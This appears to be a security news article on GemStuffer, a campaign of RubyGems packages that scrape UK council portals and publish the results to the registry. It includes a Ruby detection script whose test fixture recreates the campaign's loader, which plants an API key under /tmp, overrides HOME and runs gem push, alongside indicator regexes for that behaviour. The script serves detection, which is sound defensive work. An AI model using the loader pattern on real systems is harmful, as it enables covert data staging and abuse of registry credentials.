Today's cybersecurity headlines are brought to you by ThreatPerspective


Ethical Hacking News

GemStuffer: A Novel Campaign of Data Exfiltration through RubyGems


Researchers have disclosed GemStuffer, a campaign that abuses the RubyGems registry to stage scraped data. More than 150 gems were found carrying scripts that collect content from public-facing council portals in the United Kingdom and publish it back to RubyGems.

  • GemStuffer consists of more than 150 gems carrying scripts that scrape public-facing UK council portals and stage the results on RubyGems.
  • The scripts fetch hardcoded council portal URLs, package the HTTP responses into valid .gem archives, and publish those archives to RubyGems using embedded API keys.
  • The campaign shares its abuse pattern with a recent large-scale malicious campaign against RubyGems, which led the registry to temporarily disable new account registration.
  • Users are urged to exercise caution when working with third-party libraries and dependencies, and to regularly update and audit their software supply chain.


    GemStuffer, a newly disclosed campaign, abuses the RubyGems repository by publishing more than 150 gems whose scripts scrape public-facing council portals in the United Kingdom and stage the collected data on the registry. The campaign, discovered by cybersecurity researchers, uses the RubyGems package manager itself as the channel for both delivering the scripts and hosting what they collect.

    According to Socket, the software supply chain security firm whose researchers analyzed the GemStuffer campaign, the packages do not appear to be designed for mass developer compromise, and many have little or no download activity. Instead, the scripts within these gems fetch pages from U.K. local government democratic services portals, package the collected responses into valid .gem archives, and publish those gems back to RubyGems using hardcoded API keys.

    The development comes as a major malicious attack was reported on RubyGems itself, leading to the temporary disabling of new account registration. While it is unclear whether the two events are related, Socket noted that GemStuffer shares the same abuse pattern, which involves using newly created packages with junk names to host the scraped data.

    At its core, the GemStuffer campaign abuses RubyGems as a means of staging the scraped council content. It accomplishes this by fetching hardcoded U.K. council portal URLs, packaging the HTTP responses into valid .gem archives, and publishing those archives to RubyGems using embedded registry credentials.

    In some cases, the payload embedded within the gem creates a temporary RubyGems credentials directory under "/tmp", overrides the HOME environment variable to point at it so that the gem command-line interface (CLI) reads the planted API key rather than any credentials already present on the machine, builds a gem locally, and pushes it to RubyGems with the gem CLI. Other variants skip the CLI entirely and upload the archive directly to the RubyGems API with an HTTP POST request.

    Once the new gems have been published, all an attacker has to do is run a "gem fetch" command with the gem name and version to access the scraped data. The novel scraping campaign has been found to target public-facing ModernGov portals used by Lambeth, Wandsworth, and Southwark, aiming to collect committee meeting calendars, agenda item listings, linked PDF documents, officer contact information, and RSS feed content.
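    The staging mechanics described above (a gem whose payload is scraped HTML rather than library code, with a loader that plants credentials under /tmp, overrides HOME and pushes through the gem CLI) leave traces that can be checked for locally. The Ruby script below is an added example written for this page, not code from Socket or from the campaign: it builds two small .gem archives in memory (a constructed benign gem and a constructed GemStuffer-style gem whose loader, page and feed content are invented for the test), unpacks them with the tar classes that ship with rubygems, and reports which indicators fire. The indicator regexes and the non-Ruby-payload threshold are this example's own heuristics, not published signatures.

```ruby
require 'rubygems/package'
require 'zlib'
require 'stringio'

# Content indicators derived from the behaviour described in the article.
# These regexes are this example's own heuristics, not published signatures.
INDICATORS = {
  'HOME override'          => /ENV\[["']HOME["']\]\s*=|\bHOME=/,
  'gem push from payload'  => /\bgem\s+push\b/,
  'direct API upload'      => %r{rubygems\.org/api/v1/gems},
  'embedded API key'       => /rubygems_api_key/i,
  'embedded HTML document' => /<!DOCTYPE html|<html\b/i,
  'embedded PDF document'  => /\A%PDF-/,
  'embedded RSS/Atom feed' => /<rss\b|<feed\b/i,
}.freeze

# Build a minimal .gem in memory: an outer tar holding metadata.gz and
# data.tar.gz, the same layout `gem fetch` writes to disk.
def build_gem(name, version, files)
  data_tar = StringIO.new(''.b)
  Gem::Package::TarWriter.new(data_tar) do |tar|
    files.each do |path, content|
      tar.add_file_simple(path, 0o644, content.bytesize) { |io| io.write(content) }
    end
  end
  metadata = "--- !ruby/object:Gem::Specification\nname: #{name}\nversion: #{version}\n"
  outer = StringIO.new(''.b)
  Gem::Package::TarWriter.new(outer) do |tar|
    { 'metadata.gz' => Zlib.gzip(metadata), 'data.tar.gz' => Zlib.gzip(data_tar.string) }.each do |path, bytes|
      tar.add_file_simple(path, 0o444, bytes.bytesize) { |io| io.write(bytes) }
    end
  end
  outer.string
end

# Unpack data.tar.gz from a .gem held in memory and return {path => content}.
def gem_files(gem_bytes)
  files = {}
  Gem::Package::TarReader.new(StringIO.new(gem_bytes)) do |outer|
    outer.each do |entry|
      next unless entry.full_name == 'data.tar.gz'
      Gem::Package::TarReader.new(StringIO.new(Zlib.gunzip(entry.read))) do |inner|
        inner.each { |f| files[f.full_name] = f.read.to_s if f.file? }
      end
    end
  end
  files
end

# Report which indicators fire and how much of the payload is not Ruby source.
# A library gem is mostly .rb files; a gem used as a storage layer is not.
def scan_gem(gem_bytes)
  files = gem_files(gem_bytes)
  total_bytes = files.values.sum(&:bytesize)
  ruby_bytes  = files.sum { |path, content| path.end_with?('.rb') ? content.bytesize : 0 }
  non_ruby_share = total_bytes.zero? ? 0.0 : (1.0 - ruby_bytes.fdiv(total_bytes)).round(2)
  indicators = files.flat_map do |path, content|
    INDICATORS.select { |_, re| content.match?(re) }.keys.map { |label| "#{label} (#{path})" }
  end
  {
    files: files.keys,
    non_ruby_share: non_ruby_share,
    indicators: indicators,
    flagged: !indicators.empty? || non_ruby_share > 0.9, # 0.9 is a tunable heuristic
  }
end

# Constructed samples for this example; neither is a real gem from the campaign.
BENIGN_GEM = build_gem('tidy_strings', '0.1.0', {
  'lib/tidy_strings.rb' => "module TidyStrings\n  def self.squish(s)\n    s.strip.gsub(/\\s+/, ' ')\n  end\nend\n",
  'README.md'           => "# tidy_strings\n\nSmall whitespace helpers.\n",
})

# Loader and data files invented to mirror the behaviour the article describes:
# credentials planted under /tmp, HOME pointed at them, build and push via the
# gem CLI, and scraped pages carried as package data. The API key is a placeholder.
STUFFER_GEM = build_gem('qzxv-0931', '0.0.7', {
  'lib/qzxv.rb' => <<~'RUBY',
    require 'fileutils'
    home = '/tmp/.g'
    FileUtils.mkdir_p("#{home}/.gem")
    File.write("#{home}/.gem/credentials", ":rubygems_api_key: rubygems_PLACEHOLDER\n")
    ENV['HOME'] = home
    system('gem build qzxv.gemspec')
    system('gem push qzxv-0931-0.0.7.gem')
  RUBY
  'data/page_0001.html' => "<!DOCTYPE html><html><head><title>Browse meetings</title></head><body>constructed page</body></html>\n",
  'data/feed.xml'       => "<rss version=\"2.0\"><channel><title>Committee meetings</title></channel></rss>\n",
})

if __FILE__ == $PROGRAM_NAME
  { 'benign' => BENIGN_GEM, 'stuffer-style' => STUFFER_GEM }.each do |label, bytes|
    puts "#{label}: #{scan_gem(bytes)}"
  end
end
```

    To run the same check against a gem pulled from the registry, use `gem fetch NAME -v VERSION` and pass `File.binread('NAME-VERSION.gem')` to `scan_gem`. A library gem should report a low non_ruby_share and no indicators; a gem used as a storage layer shows mostly HTML, XML or PDF entries, and a loader that pushes from inside the payload trips the HOME override and gem push indicators.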

    It is not clear what the end goal of the campaign is, since the collected content is publicly accessible anyway. However, Socket has assessed that the systematic bulk collection and archival of this data raises the possibility that the attacker is using the council portals as a pivot to demonstrate capability against government infrastructure.

    The mechanics behind GemStuffer are deliberate: repeated gem generation, version increments, hardcoded RubyGems credentials, direct registry pushes, and scraped data embedded inside package archives. Its true nature remains unclear; it could be "registry spam," a proof-of-concept worm, or an automated scraper misusing RubyGems as a storage layer.

    In the wake of the discovery, security professionals are urging users to exercise caution when working with third-party libraries and dependencies, and to regularly update and audit their software supply chain.



    Related Information:
  • https://www.ethicalhackingnews.com/articles/GemStuffer-A-Novel-Campaign-of-Data-Exfiltration-through-RubyGems-ehn.shtml

  • https://thehackernews.com/2026/05/gemstuffer-abuses-150-rubygems-to.html


  • Published: Wed May 13 04:57:02 2026 by llama3.2 3B Q4_K_M

    © Ethical Hacking News . All rights reserved.